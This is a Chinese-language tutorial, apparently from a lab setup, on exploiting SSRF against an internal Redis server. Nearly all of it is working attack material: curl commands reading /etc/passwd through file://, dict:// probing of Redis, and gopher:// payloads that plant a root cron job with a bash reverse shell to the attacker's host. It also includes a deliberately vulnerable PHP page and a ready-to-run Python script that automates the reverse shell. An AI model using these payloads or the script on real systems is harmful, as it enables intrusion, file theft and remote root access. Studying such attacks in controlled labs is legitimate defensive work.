ssrf打内网redis

本地攻击的利用方式

（1）使用file协议 file protocol (任意文件读取)

curl -vvv "192.168.1.191:32768/ssrf.php?url=file:///etc/passwd"

（2）使用dict协议 dict protocol (获取Redis配置信息)

curl -vvv "192.168.1.191:32768/ssrf.php?url=dict://172.17.0.2:6379/info"

（3）使用gopher协议(俗称万能协议)

gopher的协议使用格式：

gopher://ip:6379/_数据

首先使用上述抓包获取的数据格式

*2
$3
get
$3
age
*2
$3
get
$4
name

进行url转码

%2a%32%0a%24%33%0a%67%65%74%0a%24%33%0a%61%67%65%0a%2a%32%0a%24%33%0a%67%65%74%0a%24%34%0a%6e%61%6d%65%0a

将其中的%0a替换成%0d%0a

%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%33%0d%0a%61%67%65%0d%0a%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a

使用gopher协议发包

curl -v "gopher://192.168.1.191:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%33%0d%0a%61%67%65%0d%0a%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a"

返回结果

应用环境部署

攻击机:kali（192.168.1.122）

应用服务器：（192.168.1.191）

docker：ssrf_redis_demo、ssrf_redis

docker pull luoshy/ssrf_redis

代码示例

ssrf.php

<?php
$ch = curl_init(); //创建新的 cURL 资源
curl_setopt($ch, CURLOPT_URL, $_GET['url']); //设置URL 和相应的选项
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); //抓取 URL 内容并把它传递给浏览器，存储进文件
curl_close($ch); ////关闭 cURL 资源，并且释放系统资源
?>

post.php

<html>
<head>
    <title>post</title>
</head>
<body>
    <?php
    echo $_REQUEST[cmd];
    ?>
</body>
</html>

file协议利用

利用file协议读取本地文件

curl -vvv "192.168.1.191:32768/ssrf.php?url=file:///etc/passwd"

dict协议利用

curl -vvv "192.168.1.191:32768/ssrf.php?url=dict://172.17.0.2:6379/info"

gopher协议利用

这里主要利用gopher协议进行shell反弹

攻击payload生成

redis客户端反弹shell命令

set greet "\n\n\n\n* * * * * bash -i >& /dev/tcp/192.168.1.122/8888 0>&1\n\n\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save
quit

进行url编码

%73%65%74%20%67%72%65%65%74%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%31%32%32%2f%38%38%38%38%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%2f%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0a%73%61%76%65%0a%71%75%69%74%0a

将其中的%0a替换成%0d%0a

%73%65%74%20%67%72%65%65%74%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%31%32%32%2f%38%38%38%38%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%2f%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0d%0a%73%61%76%65%0d%0a%71%75%69%74%0d%0a

进行url二次转码

%25%37%33%25%36%35%25%37%34%25%32%30%25%36%37%25%37%32%25%36%35%25%36%35%25%37%34%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%32%65%25%33%31%25%33%32%25%33%32%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61

拼接ssrf攻击地址生成最终payload

curl -vvv "192.168.1.191:32768/ssrf.php?url=gopher://172.17.0.2:6379/_%25%37%33%25%36%35%25%37%34%25%32%30%25%36%37%25%37%32%25%36%35%25%36%35%25%37%34%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%32%65%25%33%31%25%33%32%25%33%32%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61"

攻击利用

本地攻击机开启端口监听

nc -lvvp 8888

攻击机发送攻击payload

反弹shell成功

redis快速反弹shell攻击脚本

#!/usr/local/env python3
# -*- coding:utf-8 -*-

import urllib
import requests

#脚本参数修改处
REVERSE_IP = '192.168.1.122' #反弹shell的ip
REVERSE_PORT = '8888'	# 反弹shell的端口
CRON_PATH = '/var/spool/cron/'	#写入计划任务的目标路径，可能会不同
CRON_FILENAME = 'root'	#写入计划任务的文件名
DEST_REDIS_IP = '172.17.0.2'	#存在redis的目标主机IP
SSRF_VUL_IP = 'http://192.168.1.191:32768/ssrf.php?url='

# 生成payload
def generate_payload():
	gopher = "gopher://{}:6379/_".format(DEST_REDIS_IP)
	redis_command = """set 1 "\\n\\n* * * * * bash -i >& /dev/tcp/{}/{} 0>&1\\n\\n"
config set dir {}
config set dbfilename {}
save
quit

	""".format(REVERSE_IP, REVERSE_PORT, CRON_PATH, CRON_FILENAME)
	urlencode_one = urllib.parse.quote(redis_command, 'utf-8')
	replace_str = urlencode_one.replace('%0A', '%0D%0A')
	urlencode_two = urllib.parse.quote(replace_str, 'utf-8')
	payload = gopher + urlencode_two
	return payload

def main():
	payload = generate_payload()
	url = SSRF_VUL_IP + payload
	print(url)
	res = requests.get(url = url, timeout = 1)
	print(res.text)


if __name__ == '__main__':
	main()